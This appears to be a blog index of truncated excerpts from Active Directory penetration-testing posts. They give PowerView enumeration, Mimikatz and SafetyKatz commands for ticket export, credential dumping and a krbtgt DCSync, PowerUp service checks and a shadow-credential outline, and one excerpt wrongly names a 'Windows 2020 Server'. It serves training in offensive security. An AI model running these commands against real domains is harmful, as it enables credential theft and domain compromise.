Methodology Enumerate computers with Unconstrained Delegation Get-NetComputer -UnConstrained Check if a token is available and save to disk Get admin token After compromising the computer with UD enabled, we can trick or wait for an admin connection Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' Reuse of the DA token…
Steps to execute: # Invoke-Mimikatz Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"' # SafetyKatz SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit" # SafetyKatz Old (For Windows 2020 Server) SafetyKatz_old.exe "lsadump::dcsync /user:us\krbtgt" "exit"
1. Mimikatz Dump credentials on a local machine using Mimikatz Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 2. SafetyKatz Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz) SafetyKatz.exe -Command "sekurlsa::ekeys" "exit" # SafetyKatz Old (For Windows 2020 Server) SafetyKatz_old.exe -Command "sekurlsa::ekeys" "exit" 3. SharpKatz Dump credentials Using…
PowerUp Get services with unquoted paths and a space in their name. Get-ServiceUnquoted -Verbose Get-WmiObject -class win32_service | select pathname (wmi command/lists all paths) Get services where the current user can write to its binary path or change arguments to the binary Get-ModifiableServiceFile -Verbose Get…
In this informative tutorial, we dive into the essentials of using PowerView to enumerate trusts effortlessly. Whether you’re a cybersecurity professional, a penetration tester, or simply curious about Active Directory enumeration, this tutorial will guide you through a simple yet effective trick to uncover domain…
Delve into the world of cyber security with our comprehensive guide on ACL Enumeration. Understand how Access Control Lists (ACLs) function and how enumeration plays a critical role in network security. Equipped with tips, methods, and expert advice, this blog provides valuable insights into ACL…
Explore the intricate world of Group Policy Objects (GPO) Enumeration in our latest blog post. Learn how GPO enumeration helps manage network systems more efficiently, building a secure and controlled environment while reducing configuration errors. Stay on top of the latest trends and technologies in…
Dive into our comprehensive guide that discusses ‘Domain Enumeration using PowerView’, an essential process in the field of cybersecurity. Understand its core tenets, why it matters, the potential risks, and how to effectively use it to secure your online assets. Learn from the experts as…
Abusing User Object
1. Enumerate the permissions
2. Add the Shadow Credential
3. Using PowerView, see if the Shadow Credential is added.
4. Request the TGT by leveraging the certificate
5. Inject the TGT in the current session or use the NTLM hash
Introduction to Cross Domain Attacks Cross domain attacks are a significant threat in today’s interconnected digital environment. These attacks exploit the trust relationships between different internet domains to gain unauthorized access to sensitive information or services. With the increasing use of cloud solutions, such as…